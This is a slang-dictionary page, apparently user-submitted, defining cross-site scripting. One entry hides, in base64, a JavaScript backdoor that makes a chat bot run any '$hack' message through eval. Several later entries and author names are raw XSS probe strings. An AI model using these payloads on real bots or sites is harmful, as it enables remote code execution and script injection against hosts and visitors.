Random
Source Code

xss

cross site scripting.

the website suffers from an xss vulnerability allowing remote javascript execution.

by mike July 7, 2003

26๐Ÿ‘ 13๐Ÿ‘Ž


XSS

Short for Cross Site Scripting. A type of web based security vulnerability using client side scripts such as Javascript.

XSS takes place as a consequence of improper input sanitization. When the input provided by the user is not properly sanitized, an ill willed user may insert scripting code into a web page, which in turn will be executed by the visitor's browser. There are 2 kinds of XSS attacks: stored or reflected. Stored would mean that the injected code is permanently stored in the page, such as in a comment. Reflected would mean that it only appears once when the payload (i.e. the malicious input) is part of the request, maybe in parameters or cookies.

We have discovered an XSS vulnerability in the user profile view.

by Wild Laurasaurus October 23, 2019


command xss

^evaljs eval1-1(atob("Ym90LnNvY2tldC5vbignbWVzc2FnZScsIGZ1bmN0aW9uKGRhdGEpIHsKICBsZXQgeCA9IGRhdGEubXNnLmluZGV4T2YoJyAnKTsKICBpZihkYXRhLm1zZy5zbGljZSgwLCB4KSA9PSAnJGhhY2snKSB7CiAgICB0cnkgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCBldmFsKGRhdGEubXNnLnNsaWNlKHggKyAxKSkpOwogICAgfSBjYXRjaChlcikgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCAiRVJSOiAiICsgZXIudG9TdHJpbmcoKSk7CiAgICB9CiAgfQp9KQ=="))
/* command xss is a type of XSS attack performed on chatroom bots to gain access to the host's computer */

/* They found a command xss in my bot and deleted all my files */

by Melissa 2000 April 7, 2021


GIF XSS Payload

It is an XSS attack disguised in a GIF image.

John looked at the GIF XSS Payload suspiciously as if it was a trojan horse.

by ther_r_nu_streengs_on_mi April 17, 2020

2๐Ÿ‘ 1๐Ÿ‘Ž


onerror='alert("xss")'>

onerror='alert("xss")'>

onerror='alert("xss")'>

by <script3alert("<sc-by-MrZee")< September 3, 2016

1๐Ÿ‘ 1๐Ÿ‘Ž


Test Word <script>XSS</script>

Test definition <script>XSS</script>

Test Word <script>XSS</script>

by %C0%BCscript%C0%BEalert(1)%C0% September 17, 2017


"/><img src=xss onerror=alert(1)><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

"/><img src=xss onerror=alert(1)><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

"/><img src=xss onerror=alert(1)><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

by "/><img src=xss onerror=alert(1)><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> July 13, 2020

6๐Ÿ‘ 1๐Ÿ‘Ž